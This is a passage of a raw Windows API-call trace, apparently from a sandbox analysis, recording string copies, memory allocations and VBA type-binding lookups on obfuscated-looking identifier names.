_DstSizeInBytes=0xa, _Src=0x5370486 | out: _Dst=0x87504c0) returned 0x0 [0060.153] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5370486 | out: _Dst=0x34767c) returned 0x0 [0060.153] CRetailMalloc_Free () returned 0xcaa0401 [0060.154] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x53704ae | out: _Dst=0x87fc470) returned 0x0 [0060.154] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53704ae | out: _Dst=0x34767c) returned 0x0 [0060.154] CRetailMalloc_Free () returned 0x6140301 [0060.154] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x53704d6 | out: _Dst=0x87fc470) returned 0x0 [0060.154] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53704d6 | out: _Dst=0x34767c) returned 0x0 [0060.154] CRetailMalloc_Free () returned 0x6140301 [0060.155] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x53704fe | out: _Dst=0x87fc470) returned 0x0 [0060.155] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53704fe | out: _Dst=0x34767c) returned 0x0 [0060.155] CRetailMalloc_Free () returned 0x6140301 [0060.155] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x5370522 | out: _Dst=0x87fc470) returned 0x0 [0060.155] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5370522 | out: _Dst=0x34767c) returned 0x0 [0060.155] CRetailMalloc_Free () returned 0x6140301 [0060.156] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x537054a | out: _Dst=0x87fc470) returned 0x0 [0060.156] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x537054a | out: _Dst=0x34767c) returned 0x0 [0060.156] CRetailMalloc_Free () returned 0x6140301 [0060.156] CRetailMalloc_Realloc () returned 0x87694a0 [0060.156] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x5370572 | out: _Dst=0x87fc470) returned 0x0 [0060.156] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5370572 | out: _Dst=0x34767c) returned 0x0 [0060.156] CRetailMalloc_Free () returned 0x6140301 [0060.157] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x53705ba | out: _Dst=0x87fc470) returned 0x0 [0060.157] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53705ba | out: _Dst=0x34767c) returned 0x0 [0060.157] CRetailMalloc_Free () returned 0x6140301 [0060.157] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x5370596 | out: _Dst=0x87fc470) returned 0x0 [0060.157] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5370596 | out: _Dst=0x34767c) returned 0x0 [0060.157] CRetailMalloc_Free () returned 0x6140301 [0060.158] CRetailMalloc_Alloc () returned 0x87504c0 [0060.158] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x53705de | out: _Dst=0x87504c0) returned 0x0 [0060.158] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x53705de | out: _Dst=0x34767c) returned 0x0 [0060.158] CRetailMalloc_Free () returned 0xcaa0401 [0060.158] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537062a | out: _Dst=0x87504c0) returned 0x0 [0060.158] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537062a | out: _Dst=0x34767c) returned 0x0 [0060.158] CRetailMalloc_Free () returned 0xcaa0401 [0060.159] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x5370606 | out: _Dst=0x87fc470) returned 0x0 [0060.159] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5370606 | out: _Dst=0x34767c) returned 0x0 [0060.159] CRetailMalloc_Free () returned 0x6140301 [0060.159] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x5370652 | out: _Dst=0x87fc470) returned 0x0 [0060.159] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5370652 | out: _Dst=0x34767c) returned 0x0 [0060.159] CRetailMalloc_Free () returned 0x6140301 [0060.160] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x5370676 | out: _Dst=0x87fc470) returned 0x0 [0060.160] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5370676 | out: _Dst=0x34767c) returned 0x0 [0060.160] CRetailMalloc_Free () returned 0x6140301 [0060.160] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537069a | out: _Dst=0x87504c0) returned 0x0 [0060.160] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537069a | out: _Dst=0x34767c) returned 0x0 [0060.160] CRetailMalloc_Free () returned 0xcaa0401 [0060.161] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x53706c2 | out: _Dst=0x87fc470) returned 0x0 [0060.161] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53706c2 | out: _Dst=0x34767c) returned 0x0 [0060.161] CRetailMalloc_Free () returned 0x6140301 [0060.161] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x53706e6 | out: _Dst=0x87fc470) returned 0x0 [0060.161] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53706e6 | out: _Dst=0x34767c) returned 0x0 [0060.161] CRetailMalloc_Free () returned 0x6140301 [0060.162] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537070a | out: _Dst=0x87504c0) returned 0x0 [0060.162] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537070a | out: _Dst=0x34767c) returned 0x0 [0060.162] CRetailMalloc_Free () returned 0xcaa0401 [0060.162] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x5370732 | out: _Dst=0x87fc470) returned 0x0 [0060.162] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5370732 | out: _Dst=0x34767c) returned 0x0 [0060.162] CRetailMalloc_Free () returned 0x6140301 [0060.163] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x5370756 | out: _Dst=0x87fc470) returned 0x0 [0060.163] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5370756 | out: _Dst=0x34767c) returned 0x0 [0060.163] CRetailMalloc_Free () returned 0x6140301 [0060.163] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537077a | out: _Dst=0x87504c0) returned 0x0 [0060.163] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537077a | out: _Dst=0x34767c) returned 0x0 [0060.163] CRetailMalloc_Free () returned 0xcaa0401 [0060.164] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x53707a2 | out: _Dst=0x87fc470) returned 0x0 [0060.164] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53707a2 | out: _Dst=0x34767c) returned 0x0 [0060.164] CRetailMalloc_Free () returned 0x6140301 [0060.164] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x53707c6 | out: _Dst=0x87fc470) returned 0x0 [0060.164] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53707c6 | out: _Dst=0x34767c) returned 0x0 [0060.164] CRetailMalloc_Free () returned 0x6140301 [0060.165] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x53707ea | out: _Dst=0x87fc470) returned 0x0 [0060.165] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53707ea | out: _Dst=0x34767c) returned 0x0 [0060.165] CRetailMalloc_Free () returned 0x6140301 [0060.165] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x5370812 | out: _Dst=0x87fc470) returned 0x0 [0060.165] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5370812 | out: _Dst=0x34767c) returned 0x0 [0060.165] CRetailMalloc_Free () returned 0x6140301 [0060.166] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x537083a | out: _Dst=0x87fc470) returned 0x0 [0060.166] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537083a | out: _Dst=0x34767c) returned 0x0 [0060.166] CRetailMalloc_Free () returned 0x6140301 [0060.166] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x537085e | out: _Dst=0x87fc470) returned 0x0 [0060.166] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537085e | out: _Dst=0x34767c) returned 0x0 [0060.166] CRetailMalloc_Free () returned 0x6140301 [0060.167] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x5370882 | out: _Dst=0x87fc470) returned 0x0 [0060.167] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5370882 | out: _Dst=0x34767c) returned 0x0 [0060.167] CRetailMalloc_Free () returned 0x6140301 [0060.167] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x53708a6 | out: _Dst=0x87fc470) returned 0x0 [0060.215] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53708a6 | out: _Dst=0x34767c) returned 0x0 [0060.215] CRetailMalloc_Free () returned 0x6140301 [0060.215] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x53708ca | out: _Dst=0x87fc470) returned 0x0 [0060.215] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53708ca | out: _Dst=0x34767c) returned 0x0 [0060.215] CRetailMalloc_Free () returned 0x6140301 [0060.215] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x53708f2 | out: _Dst=0x87fc470) returned 0x0 [0060.216] CRetailMalloc_Free () returned 0x6140301 [0060.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5370916, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Apdr8SO") returned 8 [0060.216] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Apdr8SO", lHashVal=0x1080e6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x322 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x322) returned 0x0 [0060.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5370916, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Apdr8SO") returned 8 [0060.216] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Apdr8SO", lHashVal=0x1080e6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x322 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x322) returned 0x0 [0060.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5370916, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Apdr8SO") returned 8 [0060.216] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Apdr8SO", lHashVal=0x1080e6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x322 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x322) returned 0x0 [0060.217] CRetailMalloc_Free () returned 0x6140301 [0060.217] CRetailMalloc_Free () returned 0x6140301 [0060.217] CRetailMalloc_Free () returned 0x6140301 [0060.217] CRetailMalloc_Free () returned 0xcaa0401 [0060.217] CRetailMalloc_Free () returned 0x6140301 [0060.217] CRetailMalloc_Free () returned 0x6140301 [0060.218] CRetailMalloc_Free () returned 0x6140301 [0060.218] CRetailMalloc_Free () returned 0x6140301 [0060.218] CRetailMalloc_Free () returned 0xcaa0401 [0060.218] CRetailMalloc_Free () returned 0xcaa0401 [0060.218] CRetailMalloc_Free () returned 0xcaa0401 [0060.219] CRetailMalloc_Free () returned 0x6140301 [0060.219] CRetailMalloc_Realloc () returned 0x8854168 [0060.219] CRetailMalloc_Free () returned 0x6140301 [0060.219] CRetailMalloc_Free () returned 0x6140301 [0060.219] CRetailMalloc_Free () returned 0xcaa0401 [0060.219] CRetailMalloc_Free () returned 0xcaa0401 [0060.220] CRetailMalloc_Free () returned 0x6140301 [0060.220] CRetailMalloc_Free () returned 0x6140301 [0060.220] CRetailMalloc_Free () returned 0x6140301 [0060.220] CRetailMalloc_Free () returned 0x6140301 [0060.220] CRetailMalloc_Free () returned 0xcaa0401 [0060.221] CRetailMalloc_Free () returned 0x6140301 [0060.221] CRetailMalloc_Free () returned 0x6140301 [0060.221] CRetailMalloc_Free () returned 0x6140301 [0060.221] CRetailMalloc_Free () returned 0x6140301 [0060.221] CRetailMalloc_Free () returned 0x6140301 [0060.222] CRetailMalloc_Free () returned 0x6140301 [0060.222] CRetailMalloc_Free () returned 0x6140301 [0060.222] CRetailMalloc_Free () returned 0x6140301 [0060.222] CRetailMalloc_Free () returned 0x6140301 [0060.222] CRetailMalloc_Free () returned 0xcaa0401 [0060.222] CRetailMalloc_Free () returned 0x6140301 [0060.223] CRetailMalloc_Free () returned 0xcaa0401 [0060.223] CRetailMalloc_Free () returned 0xcaa0401 [0060.223] CRetailMalloc_Free () returned 0x6140301 [0060.223] CRetailMalloc_Free () returned 0x6140301 [0060.223] CRetailMalloc_Free () returned 0xcaa0401 [0060.223] CRetailMalloc_Free () returned 0x6140301 [0060.224] CRetailMalloc_Free () returned 0xcaa0401 [0060.224] CRetailMalloc_Free () returned 0xcaa0401 [0060.224] CRetailMalloc_Free () returned 0xcaa0401 [0060.224] CRetailMalloc_Free () returned 0xcaa0401 [0060.224] CRetailMalloc_Free () returned 0x6140301 [0060.225] CRetailMalloc_Free () returned 0xcaa0401 [0060.225] CRetailMalloc_Free () returned 0x6140301 [0060.225] CRetailMalloc_Realloc () returned 0x88a1ed0 [0060.226] CRetailMalloc_Free () returned 0xcaa0401 [0060.227] CRetailMalloc_Free () returned 0x6140301 [0060.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371032, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="CR7dIkJ") returned 8 [0060.227] ITypeComp:RemoteBind (in: This=0x87cef08, szName="CR7dIkJ", lHashVal=0x104f1f, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x382 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x382) returned 0x0 [0060.227] CRetailMalloc_Alloc () returned 0x87fc470 [0060.227] CRetailMalloc_Free () returned 0x6140301 [0060.228] CRetailMalloc_Free () returned 0x6140301 [0060.228] CRetailMalloc_Free () returned 0x6140301 [0060.228] CRetailMalloc_Free () returned 0xcaa0401 [0060.228] CRetailMalloc_Free () returned 0x6140301 [0060.228] CRetailMalloc_Free () returned 0xcaa0401 [0060.228] CRetailMalloc_Free () returned 0x6140301 [0060.229] CRetailMalloc_Free () returned 0x6140301 [0060.229] CRetailMalloc_Free () returned 0x6140301 [0060.229] CRetailMalloc_Free () returned 0xcaa0401 [0060.229] CRetailMalloc_Realloc () returned 0x87cc428 [0060.229] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d2001a, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_g4psf5vKa") returned 17 [0060.229] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_g4psf5vKa", lHashVal=0x109931, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.230] CRetailMalloc_Free () returned 0xcaa0401 [0060.230] CRetailMalloc_Free () returned 0x6140301 [0060.230] CRetailMalloc_Free () returned 0x6140301 [0060.230] CRetailMalloc_Free () returned 0xcaa0401 [0060.230] CRetailMalloc_Free () returned 0x6140301 [0060.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537124a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Hq4osza") returned 8 [0060.231] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Hq4osza", lHashVal=0x106fb7, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x39e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x39e) returned 0x0 [0060.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537124a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Hq4osza") returned 8 [0060.231] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Hq4osza", lHashVal=0x106fb7, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x39e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x39e) returned 0x0 [0060.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537124a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Hq4osza") returned 8 [0060.231] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Hq4osza", lHashVal=0x106fb7, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x39e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x39e) returned 0x0 [0060.231] CRetailMalloc_Free () returned 0x6140301 [0060.231] CRetailMalloc_Free () returned 0x6140301 [0060.232] CRetailMalloc_Free () returned 0x6140301 [0060.232] CRetailMalloc_Free () returned 0x6140301 [0060.232] CRetailMalloc_Free () returned 0x6140301 [0060.232] CRetailMalloc_Free () returned 0x6140301 [0060.232] CRetailMalloc_Free () returned 0x6140301 [0060.232] CRetailMalloc_Free () returned 0x6140301 [0060.233] CRetailMalloc_Free () returned 0x6140301 [0060.233] CRetailMalloc_Realloc () returned 0x87cbeb0 [0060.233] CRetailMalloc_Free () returned 0xcaa0401 [0060.233] CRetailMalloc_Free () returned 0xcaa0401 [0060.233] CRetailMalloc_Free () returned 0xcaa0401 [0060.233] CRetailMalloc_Free () returned 0x6140301 [0060.234] CRetailMalloc_Free () returned 0xcaa0401 [0060.234] CRetailMalloc_Free () returned 0x6140301 [0060.234] CRetailMalloc_Free () returned 0x6140301 [0060.234] CRetailMalloc_Free () returned 0xcaa0401 [0060.234] CRetailMalloc_Free () returned 0xcaa0401 [0060.235] CRetailMalloc_Free () returned 0x6140301 [0060.235] CRetailMalloc_Free () returned 0x6140301 [0060.235] CRetailMalloc_Free () returned 0x6140301 [0060.235] CRetailMalloc_Free () returned 0x6140301 [0060.235] CRetailMalloc_Free () returned 0x6140301 [0060.236] CRetailMalloc_Free () returned 0xcaa0401 [0060.236] CRetailMalloc_Free () returned 0x6140301 [0060.236] CRetailMalloc_Free () returned 0xcaa0401 [0060.236] CRetailMalloc_Free () returned 0xcaa0401 [0060.236] CRetailMalloc_Free () returned 0xcaa0401 [0060.236] CRetailMalloc_Free () returned 0x6140301 [0060.237] CRetailMalloc_Alloc () returned 0x87fc470 [0060.237] CRetailMalloc_Free () returned 0x6140301 [0060.237] CRetailMalloc_Free () returned 0xcaa0401 [0060.237] CRetailMalloc_Free () returned 0x6140301 [0060.237] CRetailMalloc_Free () returned 0x6140301 [0060.238] CRetailMalloc_Free () returned 0x6140301 [0060.238] CRetailMalloc_Free () returned 0x6140301 [0060.238] CRetailMalloc_Free () returned 0x6140301 [0060.238] CRetailMalloc_Free () returned 0x6140301 [0060.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53717c6, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="AAgMShB") returned 8 [0060.238] ITypeComp:RemoteBind (in: This=0x87ce890, szName="AAgMShB", lHashVal=0x10a40f, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3e8 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3e8) returned 0x0 [0060.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53717c6, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="AAgMShB") returned 8 [0060.238] ITypeComp:RemoteBind (in: This=0x87ce668, szName="AAgMShB", lHashVal=0x10a40f, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3e8 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3e8) returned 0x0 [0060.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53717c6, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="AAgMShB") returned 8 [0060.239] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="AAgMShB", lHashVal=0x10a40f, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3e8 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3e8) returned 0x0 [0060.239] CRetailMalloc_Free () returned 0x6140301 [0060.239] CRetailMalloc_Free () returned 0x6140301 [0060.239] CRetailMalloc_Free () returned 0x6140301 [0060.239] CRetailMalloc_Free () returned 0xcaa0401 [0060.240] CRetailMalloc_Free () returned 0xcaa0401 [0060.240] CRetailMalloc_Free () returned 0x6140301 [0060.241] CRetailMalloc_Realloc () returned 0x889e630 [0060.241] CRetailMalloc_Realloc () returned 0x87fc470 [0060.241] CRetailMalloc_Realloc () returned 0x86bafe0 [0060.241] CRetailMalloc_Free () returned 0x6890301 [0060.241] CRetailMalloc_Realloc () returned 0x87fc1b8 [0060.241] ITypeComp:RemoteBind (in: This=0x87ce890, szName="IrPzb7", lHashVal=0x10d753, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3f6 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3f6) returned 0x0 [0060.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53718d2, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="IrPzb7") returned 7 [0060.242] ITypeComp:RemoteBind (in: This=0x87ce668, szName="IrPzb7", lHashVal=0x10d753, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3f6 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3f6) returned 0x0 [0060.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53718d2, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="IrPzb7") returned 7 [0060.242] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="IrPzb7", lHashVal=0x10d753, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3f6 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3f6) returned 0x0 [0060.242] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Urjiz0Xq8", cchCount1=-1, lpString2="IrPzb7", cchCount2=-1) returned 3 [0060.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53718d2, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="IrPzb7") returned 7 [0060.243] ITypeComp:RemoteBind (in: This=0x87cef08, szName="IrPzb7", lHashVal=0x10d753, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3f6 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3f6) returned 0x0 [0060.243] CRetailMalloc_Alloc () returned 0x87fc500 [0060.243] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x53718d2 | out: _Dst=0x87fc500) returned 0x0 [0060.244] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20896, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_IrPzb7") returned 14 [0060.244] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_IrPzb7", lHashVal=0x1051bd, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.244] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53718d2 | out: _Dst=0x34767c) returned 0x0 [0060.244] CRetailMalloc_Free () returned 0x65c0301 [0060.244] ITypeComp:RemoteBind (in: This=0x87ce890, szName="I7jpbwTh", lHashVal=0x109e0d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3f8 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3f8) returned 0x0 [0060.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53718f6, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="I7jpbwTh") returned 9 [0060.245] ITypeComp:RemoteBind (in: This=0x87ce668, szName="I7jpbwTh", lHashVal=0x109e0d, wFlags=0x5, 